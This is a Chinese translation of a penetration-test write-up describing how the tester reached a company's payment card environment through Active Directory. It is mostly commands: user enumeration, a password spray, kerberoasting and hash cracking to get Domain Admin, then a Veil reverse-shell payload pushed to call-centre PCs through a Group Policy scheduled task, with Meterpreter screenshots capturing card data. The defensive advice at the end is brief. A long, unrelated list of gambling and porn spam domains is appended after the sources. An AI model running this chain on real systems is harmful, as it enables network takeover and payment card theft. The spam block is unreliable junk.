一步步绕过Windows域中的防火墙获取支付卡敏感数据

阅读量    96532 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

22.png

在这篇文章中我将详细介绍如何绕过防火墙,进入CDE(持卡人数据环境,代表存储、处理和传输支付卡敏感数据的计算机环境),最终提取信用卡数据。

一般来说,如果你要存储、传输或处理支付卡数据,那么就必须要确保支付卡数据在你的内部网络中保持高度安全,内部网络环境必须符合PCI数据安全标准(PCI-DSS)。当然,如果你的内部网络进行了分段,则不必让整个内部网络都符合PCI规范,只需让分段出的处理支付卡数据的环境符合PCI数据安全标准。而分段,即隔离出CDE,通常是利用防火墙来实现的。

以上就是有关此次渗透测试的一些背景,现在让我们正式开始吧。

注意,文中所有敏感信息都已修改,与真实数据相差甚远。目标公司拥有一个非常庞大的内部网络,所有IP都在10.0.0.0/8范围内。而持卡人数据位于单独的192.168.0.0/16范围内,与公司其他部门隔离。对CDE的操作主要由呼叫中心的操作员在接听客户电话后,在外部的Web应用中将资金细节输入表格再提交。

让我们从普通的内部环境开始,在10.0.0.0/8的范围内连接到公司的内部办公网络,然后我们使用ping和端口扫描从当时网络位置扫描整个CDE,结果如下:

33.png

44.png

ping扫描与直接使用ping命令效果基本一样,只不过nmap可以一次扫描整个网段。而第二个命令结果中的hosts up其实和nmap的参数-Pn有关,nmap在此情况下不会ping操作,此时nmap会将扫描范围内的所有主机都报告为up,真实情况可能完全相反。

因此,除非你有能绕过防火墙的手段,或者可以猜到管理防火墙的密码,否则直接扫描似乎不太可能。现在,我们要做的就是通过取得域管理员权限来控制活动目录。

?

成为域管理员

有很多方法可以做到这一点,比如我之前发表的这篇文章

在这种情况下,我可以利用kerberoast(就是破解Kerberos服务票据并改写)来控制域。我需要在域中找一个未授权的攻击点,逐步深入。

攻击活动目录的第一步是控制尽可能多的用户帐户,只要它们能以某种方式和域控制器进行身份验证即可。在Windows世界中,所有帐户都应该能通过域控制器进行身份验证,即使它们没有权限执行任何操作也是如此。在Windows默认安全级别下,即使是权限最低的帐户在登录时也需要验证密码是否正确。

在客户的内网环境中,域控制器允许建立空会话(在未提供用户名与密码的情况下建立会话)。在这种情况下,我们又发现域控制器IP为10.0.12.100,“PETER”。这使得我们可以用enum4linux等工具枚举用户,得到域中每个用户的用户名:

$ enum4linux -R 1000-50000 10.0.12.100 |tee enum4linux.txt

55.png

66.png

现在我们有了一个用户列表,我们可以将它转变成一个可阅读的格式:

$ cat enum4linux.txt | grep '(Local User)' |awk '$2 ~ /MACFARLANE\/ {print $2}'| grep -vP '^.*?$$' | sed 's/MACFARLANE\//g'

77.png

在实际情况下,这个内部网络异常庞大,活跃用户超过25000人。

现在我们将用户名整理成文本文件,然后使用CrackMapExec等工具来猜测密码。在这里,我们将统一测试是否有用户使用Password1作为他们的密码。不要小看这个密码,它可符合活动目录默认的密码复杂性要求,因为它包含四种字符类型中的三种(大写,小写和数字)。

$ cme smb 10.0.12.100 -u users.txt -p Password1

Wow,有一个成功:

88.png

请注意,如果你想测试完所有帐户,需要指定参数--continue-on-success

99.png

现在我们已经控制了一个帐户,可以查询活动目录,获得服务帐户列表。服务帐户是一种代表服务的帐户,就像Microsoft SQL Server这样的服务。这些服务运行时,需要在以某种帐户身份存在于系统。活动目录的Kerberos身份验证系统可给其提供访问权限,此时活动目录需要提供“服务票据”以方便用户对其进行身份验证。Kerberos的身份验证不在本文的讨论范围之内,如果你想了解更多信息,可以点击这里

通过从域控制器请求Kerberos服务帐户列表,我们还能得到每个帐户的“服务票据”。此服务票据是使用服务帐户的密码所加密。因此,如果我们可以破解它,就有很大概率得到高权限帐户。Impacket工具集可以帮助我们批量请求:

$ GetUserSPNs.py -outputfile SPNs.txt -request 'MACFARLANE.EXAMPLE.COM/chuck:Password1' -dc-ip 10.0.12.100

100.png

正如我们所看到的,其中一个服务帐户是Domain Admins的成员,这就是我们的目标。

$ hashcat -m 13100 --potfile-disable SPNs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

在运行hashcat进行密码破解后,我们得到了明文密码:

110.png

为了二次确认,我再次使用了CrackMapExec

$ cme smb 10.0.12.100 -u redrum -p 'murder1!'

120.png

Wahoo,Pwn3d!现在我们已经是域控制器的管理员了。

?

得到支付卡数据

现在,我们的目标是CDE中接受呼叫中心指令的计算机,它们都位于同一个活动目录中,虽然我们无法直接连接到那些敏感的机器,但我们现在可以告诉域控制器让它们来连接我们。为此,需要深入了解组策略对象(GPO)。GPO允许将各种范围级别的设置应用于用户和计算机。为了防止保护客户隐私,你只需要知道它可以以不同范围级别控制域中的计算机。

客户GPO的许多功能都是用于统一管理组织中的IT设置。例如,统一设置密码策略或者统一设置为用户桌面显示哪些图标(例如,打开公司网站的快捷方式)。而有一个GPO可以运行微软中的“计划任务”。这正是我们所需要的…我创建一个需要目标机器运行的脚本,让它们连接回我们的机器。以下是具体步骤:

1.生成payload。这里我们使用了Veil Evasion。我们的IP地址是10.0.12.1,因此我们设置回连到这个地址。

$ veil -t EVASION -p 22 --ip 10.0.12.1 --port 8755 -o pci_shell

130.png

2.使用我们从kerberoasting获得的凭据,通过远程桌面协议(RDP)登录到域控制器。

140.png

3.在活动目录中找到CDE。根据我们对客户组织的了解,我们知道呼叫中心在2楼工作。通过浏览目录,我们定位到一个特殊的名字:

150.png

4.将我们用Veil制作的恶意脚本放入文件夹,然后在域控制器上进行共享。在共享和目录上设置权限,允许所有域用户读取。

160.png

5.在GPO中,我们在如下图创建策略:

170.png

6.在编辑这个新的GPO时,查找“计划任务”选项,并创建新的“即时计划任务”:

180.png

7.创建指向共享中恶意脚本的任务。同时在common下设置Run in logged-on user's security context

190.png

Done!

在我等了15分钟后,什么也没发生。我知道组策略的生效可能需要90分钟或者更久,但我觉得至少有一台机器现在已经应用了新策略(注意,如果在实验室中测试,你可以使用gpupdate/force)。然后我又等了五分钟,看到了如下情况:

aa.png

运行命令截取屏幕截图,确切地返回了呼叫中心当时输入的内容…支付卡数据!

200.png

渗透目标已全部完成!

如果我们查看会话列表,我们可以看这个会话的IP来自192.168.0.0/16

bb.png

在实际测试中,整个二楼的机器基本都返回了shell,我最后得到了60-100个Meterpreter。

在实际的测试中,有一个专门截图的脚本(我们使用metasploit的autorunscript来实现),这样我们就可以深入其他方面。

还有其他获取截图的命令,例如在Meterpreter中使用use espia以及metasploit的post/windows/gather/screen_spy

还有一些以编程的方式执行GPO的方法,例如PowerView中的New-GPOImmediateTask

而从防御的角度来说,可以实施很多安全措施,例如把CDE设置一个单独的活动目录,鼓励用户设置强密码并确保任何服务帐户都是疯狂的长密码(20多个字符,完全随机)。还可以检测是否有任何用户一次性去请求所有服务的票据,也可以使用蜜罐进行防御。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场:https://nosec.org/home/detail/2523.html
来源:https://markitzeroday.com/pci/active-directory/kerberoast/firewall/2019/04/24/gaining-access-to-card-data-using-the-windows-domain-to-bypass-firewalls.html
香港最快现场开奖记录-香港最快现场开奖结果-香港最快直播开奖现场
m.2121buy.com m.304496092.com m.52chendumeishi.com m.52qqcz.com m.7568872.com m.99vv340.com m.agag70.com m.anpinglansai.com m.asshishicai.com m.baoshidamall.com m.bjoso.com m.bocdima.com m.bxxyzl.com m.cdjutaiedu.com m.cl1899.com m.cpexe.com m.cztxhg666.com m.diejuji66.com m.dmgjzx.com m.dphhw.com m.elitecld.com m.esexfree.com m.ezupdos.com m.fanfan-zone.com m.fengwoyidong.com m.getfault.com m.hcxiangjiao.com m.hf556.com m.hongfushangmao.com m.huibobet.com m.hyhatch.com m.hzybqh.com m.ibroyeur.com m.jiangyaqing.com m.ksuca.com m.liangdianjiaoyu.com m.lovegwu.com m.mayihuobang.com m.miaoxiangshike.com m.miiqin.com m.modelslimming.com m.msjyhs.com m.mysoushou.com m.myteenssex.com m.nanahey.com m.o48d.com m.o8jw.com m.pzsyr.com m.qgbrs.com m.rbrbt.com m.rfynq.com m.rqwdt.com m.rxbled.com m.rxdmn.com m.sct-ys.com m.sdyxtjy.com m.spark-eo.com m.spyware-pcrisk.com m.sxlrr.com m.syhrzg.com m.tadeyijia.com m.tengjingkj.com m.tiantianoa.com m.tykjr.com m.uxf7.com m.weakbug.com m.wgppd.com m.xajyz.net m.xiqidai.com m.yczszw.com m.youxiaad.com m.yue8888.com m.yzkths.com m.zqbf137.com m.zqssc05.com m.zsbxp.com m.zspxk.com m.zsxscj.com www.88366666.com www.942dn.com www.lottimes.com www.opc32.com www.ss-tm.com www.tiaopigui.com www.xmyinhe.com www.mfkof.com www.upsbbs.com www.gzesmb.com www.niqzone.com www.m-instyLe.cn m.1yguz.com m.2huoo.net m.51bpbpz.net m.53zy.net m.5ecn.net m.91youhui.net m.adospados.com m.afty.net m.afzn.net m.baobeiqianbao.net m.bestmeet.net m.bjbna.net m.bjkjwj.net m.cg365sc.net m.cnyntq.net m.congdash.net m.coybcs.net m.csoug.net m.dijier.net m.djhsc.net m.donghuiwan.com m.dsi-ag.com m.dzshgwx.net m.eamoy.net m.ecopote.com m.ehuiche.net m.eiconf.net m.eimeeting.net m.ez-ns.com m.freshkpop.net m.gaoxiaoduanzi.net m.glxiduobao.com m.guiqin.net m.guogai.net m.gydushu.com m.haokan5.net m.hltjq.net m.hshardcover.com m.huangjinnc.com m.huangzhe0910.com m.i517.net m.icauto.net m.ijiawei.net m.iyaorao.net m.iyuwei.net m.izxs.net m.jlskjk.com m.jnrstc.com m.jnxins.com m.joinchampions.com m.jsywym.net m.juezhe.net m.julisports.net m.kardon023.com m.keiee.net m.kkdb168.com m.ksb120.net m.kzbiz.net m.laziw.com m.lcoder.net m.lefuxx.com m.live-cam4sex.com m.louboutinb.com m.ly568.net m.matengfei.net m.mblabc.net m.mcmcmc.net m.meitwo.net m.miyueing.com m.mjrgb.com m.mmd47.com m.mms39.com m.nanjingwx.com m.naodongxueyuan.com m.ncwywk.com m.neimengguly.com m.newcityvr.com m.newhnwg.com m.ngzrb.com m.nianlai.net m.niuhuotong.com m.nj142.com m.nmgmmw.com m.nnwsn.com m.nongtaifruit.com m.npymh.com m.nqbcs.com m.nwezq.com m.oe2pq.com m.p950r.com m.panoad.net m.papasj.com m.pcfordlm.com m.pinkypunk.com m.pojox.net m.popo365.net m.portalfan.net m.qhy360.com m.qinghuayingyu.com m.qingjiankeji.com m.qirongzhongchou.net m.qiutianzichan.com m.quanminkuaiduobao.com m.quansiweizhiyuan.com m.readc.net m.rpocr.net m.sdell.net m.sdhzz.net m.senrijin.com m.shangzewangluo.com m.shanmeme.com m.shanrenzixunjituan.com m.shengwh.com m.shengzhiqi.net m.shfongwei.com m.shiguangji888.com m.shiyihui.net m.shop666.net m.shoppniac.com m.shyarun.com m.softsweet.net m.sxsgky.net m.szifresh.com m.tahuyu.net m.taiyear.net m.taowogo.com m.taxionghaizi.com m.thirftyfun.com m.tiqianme.com m.tjcbmy.com m.tjynet.com m.tyc1413191.com m.v-liandong.com m.v-quick.net m.vrwar.net m.walyy.net m.we30.net m.weixd.net m.wenancn.net m.wetrussian.com m.wuaimei.net m.wuyutong.net m.wzj0759.com m.xianyoujie.com m.xiaolangli.com m.xiaolieai.com m.xiawangshipin.com m.xiyuesh.com m.xuanf.net m.xyflower.net m.xzcit.net m.yifoobao.net m.yjhzttjq.com m.yjk1997.com m.ylmov.net m.yongyijinfu.com m.yueguoji.net m.zhansen8.com m.zhaokuandai.com m.zhc-nj.com m.zhongruiedu.com m.zivdoll.com m.zjjyjn.com m.zmkaolu.com m.zmtbs.com m.zmysjh.com m.zzfreemaker.com
分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多